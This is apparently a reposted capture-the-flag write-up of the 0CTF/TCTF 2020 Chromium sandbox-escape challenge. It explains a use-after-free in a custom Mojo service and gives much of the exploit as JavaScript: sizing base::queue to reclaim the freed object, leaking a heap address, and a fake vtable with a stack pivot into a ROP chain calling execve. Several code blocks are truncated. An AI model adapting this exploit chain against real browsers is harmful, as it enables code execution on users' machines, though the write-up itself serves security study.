0CTF/TCTF 2020 Quals Chromium SBX
2020-07-08 01:32:51 Author: wiki.ioin.in(查看原文) 阅读量:654 收藏

0x00 Overview

Last weekend we played 0CTF/TCTF Quals and got 4th place, which is awesome. As a browser security researcher, I solved Chromium RCE and SBX, and it is my first time to exploit the Chromium SBX, so I think it is worthy to do a writeup.

In this challenge, a UAF is caused by improper use of unique_ptr::get, and by manipulating base::queue we can allocate a buffer with same size as the UAF object, which allows us to completely control the UAF object. Then the heap address can be leaked by inserting elements into base::deque field of a UAF object, whose contents can be controlled and obtained. Then we can control the RIP by rewriting the vtable and call the virtual function. By pivoting the stack ROP can be done.

0x01 Bug

I won’t go through the logic of new mojo service since it is not hard to understand. It is just a simple storage service. TStorage is the factory interface used to create the instance, and TInstance is the actual interface that provides storage operations.

The bug is the improper use of unique::ptr:

void TStorageImpl::Init(InitCallback callback) {
    inner_db_ = std::make_unique<InnerDbImpl>();
    // Init will release the previous inner_db pointer

void TStorageImpl::CreateInstance(CreateInstanceCallback callback) {
    mojo::PendingRemote<blink::mojom::TInstance> instance;
    // so inner_db_.get() pointer obtained previously will be freed
    // which is UAF

In the code above, TStorageImpl::CreateInstance will pass the pointer stored inside unique_ptr inner_db_ into the constructor of TInstanceImpl using get, and the new TInstanceImpl instance will store the pointer into its field. However, TStorageImpl::Init can be called multiple times; if it is called when inner_db_ already contains an instance, the previous instance will be deleted. If that previous instance was passed to TInstanceImpl and thus stored by the TInstanceImpl instance, a UAF of an InnerDbImpl instance would be caused.

0x02 Exploitation

Control the Contents of the UAF Object

As we can see, there is a virtual function for InnerDbImpl class. Therefore the idea is clear: we need to allocate a memory chunk with same size as the InnerDbImpl to fully control its contents, including the virtual table and thus the rip can be hijacked. However, this got me stuck for quite long time. Since we cannot directly allocate a memory chunk with arbitrary size directly, we must manipulate to allocate a memory chunk whose size is same as InnerDbImpl. By reading the code and debugging, we found that the sizeof of InnerDbImpl is 0x678.

The only possible field that can allow us to do so is base::queue<uint64_t> queue_. However, if we just pushing new elements into the queue, it seems that the sizes of buffers being allocated will simply “jump over” the our desired size. Nonetheless, we still have a pop operation, and this pop operation may allow us to be able to manipulate the size of buffer being allocated. Thus, we need to know how base::queue is implemented.

As queue.h shows, base::queue is simply queue but with base::circular_deque as Container:

// Provides a definition of base::queue that's like std::queue but uses a
// base::circular_deque instead of std::deque. Since std::queue is just a
// wrapper for an underlying type, we can just provide a typedef for it that
// defaults to the base circular_deque.
template <class T, class Container = circular_deque<T>>
using queue = std::queue<T, Container>;

Thus the critical thing is how circular_deque is implemented.

We can know from reading STL source code that std::queue calls push_back as push and calls pop_front as pop. Therefore, we need to focus on these 2 functions of base::circular_deque.

// --- push ---
void push_front(const T& value) { emplace_front(value); }
template <class... Args>
reference emplace_front(Args&&... args) {
  // the function used to expand buffer,
  // which we care about because this affect the size of buffer allocated

  // ... do the actual push, which we don't care

// --- pop ---
void pop_front() {
  // ... actual poping operation, which we don't care

  // the function used to shrink the capacity, which is buffer size,
  // so we care about this function

  // ...

Thus, the function that we need to care about is ExpandCapacityIfNecessary and ShrinkCapacityIfNecessary, let’s look at their implementation.

// Expands the buffer size. This assumes the size is larger than the
// number of elements in the vector (it won't call delete on anything).
void SetCapacityTo(size_t new_capacity) {
  // Use the capacity + 1 as the internal buffer size to differentiate
  // empty and full (see definition of buffer_ below).
  VectorBuffer new_buffer(new_capacity + 1);
  // using VectorBuffer = internal::VectorBuffer<T>;
  // if we look at implementation of VectorBuffer, this will allocate
  // `(new_capacity + 1) * sizeof(T)` bytes of memory.
  // since our queue element type is uint64_t, sizeof(T) is 8.
  // thus to allocate 0x678 bytes, 
  // we need to let new_capacity=(0x678/8)-1=206
  MoveBuffer(buffer_, begin_, end_, &new_buffer, &begin_, &end_);
  buffer_ = std::move(new_buffer);
void ExpandCapacityIfNecessary(size_t additional_elts) {
  size_t min_new_capacity = size() + additional_elts;
  if (capacity() >= min_new_capacity)
    return;  // Already enough room.

  min_new_capacity =
      std::max(min_new_capacity, internal::kCircularBufferInitialCapacity);
  // in our case, min_new_capacity > internal::kCircularBufferInitialCapacity
  // when this line is reached,
  // because kCircularBufferInitialCapacity is the initial capacity, 3

  // std::vector always grows by at least 50%. WTF::Deque grows by at least
  // 25%. We expect queue workloads to generally stay at a similar size and
  // grow less than a vector might, so use 25%.
  size_t new_capacity =
      std::max(min_new_capacity, capacity() + capacity() / 4);
  // grow 25% each time, but we need to at least grow to min_new_capacity

void ShrinkCapacityIfNecessary() {
  // Don't auto-shrink below this size.
  if (capacity() <= internal::kCircularBufferInitialCapacity)

  // Shrink when 100% of the size() is wasted.
  // namely only shrink when size <= empty_space
  size_t sz = size();
  size_t empty_spaces = capacity() - sz;
  if (empty_spaces < sz)

  // Leave 1/4 the size as free capacity, not going below the initial
  // capacity.
  size_t new_capacity =
      std::max(internal::kCircularBufferInitialCapacity, sz + sz / 4);
  // since `sz` is around `capacity/2`, 
  // so capacity is shrinked to around `5/8` of the original capacity  
  if (new_capacity < capacity()) {
    // Count extra item to convert to internal capacity.

Since the expanding is 5/4 of the original capacity and shrinking is 5/8 of the original capacity, it seems that it is possible to let capacity to any value! great! But how to figure out the way to let capacity=206? You may try some advanced technique like BFS, but I don’t think it is as complicated as that. What I did is simply expand and shrink randomly and see if desired new_capacity value is obtained. Here is the code:

from random import *
x = 10 
# we start at 10, because 10 is the capacity value 
# that +1/4 operation starts to play the expanding role 
ways = []
while x < 207:
	b = random() > 0.1 # we want more expand
	if b: # mimic expand operation
		x = int(max(x + 1, x + x / 4))
	else: # mimic shrink operation
		x = x / 2
		x += x / 4
	print (x)
	if x == 206:
		print "!!!" # notify when 206 is reached
print ways

Finally, my series of operation to obtain the 206 capacity is:

operations: 10 -> True, True, True, True, True, True, True, True, True, True, True, False, True, True, False, True, True, False, True, True, True, True, True, True,
sizes: 12 15 18 22 27 33 41 51 63 78 97 60 75 93 57 71 88 55 68 85 106 132 165 206

After trial, this indeed allocates the desired 0x678 size memory chunk. Here is the JS code:

async function sprayQueue(tInsPtrSprays, val=0x41414141)
	let i = 0;
	for (const tInsPtr of tInsPtrSprays)
		for (let i = 0; i < 97; i++)
			await tInsPtr.push(val);
		for (let i = 0; i < 49; i++)
			await tInsPtr.pop();
		// current capacity: 60, current size: 48
		for (let i = 0; i < 93 - 48; i++)
			await tInsPtr.push(val);
		for (let i = 0; i < 47; i++)
			await tInsPtr.pop();
		// current capacity: 57, current size: 46
		for (let i = 0; i < 88 - 46; i++)
			await tInsPtr.push(val);
		for (let i = 0; i < 44; i++)
			await tInsPtr.pop();
		// current capacity: 55, current size: 44
		for (let i = 0; i < 206 - 44 - 1; i++)
			await tInsPtr.push(0);
		await tInsPtr.push(i);
		// int_value_, we can use this to identify 
        // which tInsPtr's queue is occupying the UAF object

		// console.log(await tInsPtr.getTotalSize());

While tInsPtrSprays must be created beforehand(e.i. before UAF is triggered), otherwise the InnerDbImpl created in init will occupy the UAF object instead.

async function createSprayObjects(tInsPtrSprays)
	const tStrPtrSpray = new blink.mojom.TStoragePtr();
		mojo.makeRequest(tStrPtrSpray).handle, 'context', true);
	await tStrPtrSpray.init();
	const tInsPtr = (await tStrPtrSpray.createInstance()).instance;

Leak Heap Address

After we are able to control the contents of the UAF object, we must leak the heap address to construct and use a fake vtable on heap. My idea is to fill the UAF object such that base::queue field is filled with all zeros, which means an empty queue. After then, we can push something into the queue to let it become a heap address pointing to contents that we can control (e.i. contents pushed into queue). Then, we can pop base::queue field of the tInsPtr whose base::queue field is occupying the UAF object, thus to leak that heap address stored in base::queue field of UAF object.

The code is shown as follows:

// tInsPtr here is the UAF object
const idx = (await tInsPtr.getInt()).value;
print(idx); // get which one is occupying the UAF object
for (let i = 0; i < 201; i++)
	await tInsPtrSprays[idx].pop();
const heapAddr = (await tInsPtrSprays[idx].pop()).value;
// pop element to leak the address of heap
// now 0x678 is freed again due to poping elements

Code Execution

Finally we are here! According to exploit of mojo in Plaid CTF, we found that xchg rsp,rax is a gadget existed in Chrome binary, thus we found this manually using gdb search as running ropper on Chrome is too slow. Since when calling the virtual table function, rax points to vtable, which is the buffer we can control, we can put our ROP chain at rax along with the fake virtual function address! My approach is to use the buffer of base::queue whose address is the one we leaked as the fake virtual table. Thus ROP chain and address of xchg rsp,rax as fake virtual function are pushed into the base::queue when leaking the heap address as suggested above.

// rop and fake virtual table
// 0xd1ba7: lea rdi, [rsp + 0xb0]; mov rsi, rbp; call rbx
// 0x52bc8: pop rbp; pop rbx; ret;
// 0x2cb49: pop rbx; ret;
// 0x1b96: pop rdx; ret;
// 0x439c8: pop rax; ret;

// tInsPtr is the UAF object whose base::queue field is empty intially
await tInsPtr.push(libcAddr + 0x52bc8); // begin of ROP
await tInsPtr.push(0); // let queue to have some element
await tInsPtr.push(textAddr + 0x3fa5114); // xchg rsp,rax, as virtual table
await tInsPtr.push(libcAddr + 0x2cb49);
await tInsPtr.push(libcAddr + 0xe4e30); // execve

await tInsPtr.push(libcAddr + 0x1b96);
await tInsPtr.push(0); // rdx = 0

await tInsPtr.push(libcAddr + 0xd1ba7);

for (let i = 0; i < 0x10; i++) {
	await tInsPtr.push([0x6c662f2e, 0x705f6761]);
// setUint64 in mojo_bindings.js is modified to this to support this,
// otherwise we cannot set a correct uint64
// due to the precision of js number
Buffer.prototype.setUint64 = function(offset, value) {
  var hi;
  if (typeof value == 'object') {
    hi = value[1];
    value = value[0]
  else {
    hi = (value / kHighWordMultiplier) | 0;
  if (kHostIsLittleEndian) {
    this.dataView.setInt32(offset, value, kHostIsLittleEndian);
    this.dataView.setInt32(offset + 4, hi, kHostIsLittleEndian);
  } else {
    this.dataView.setInt32(offset, hi, kHostIsLittleEndian);
    this.dataView.setInt32(offset + 4, value, kHostIsLittleEndian);
	await tInsPtr.push(0x7265746e6972)

Here is the full exploit.

文章来源: https://wiki.ioin.in/url/ZQJq